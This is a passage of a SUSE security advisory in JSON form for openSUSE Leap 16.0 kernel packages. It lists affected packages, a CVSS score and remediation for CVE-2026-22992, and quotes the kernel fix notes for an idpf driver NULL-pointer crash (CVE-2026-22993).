"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
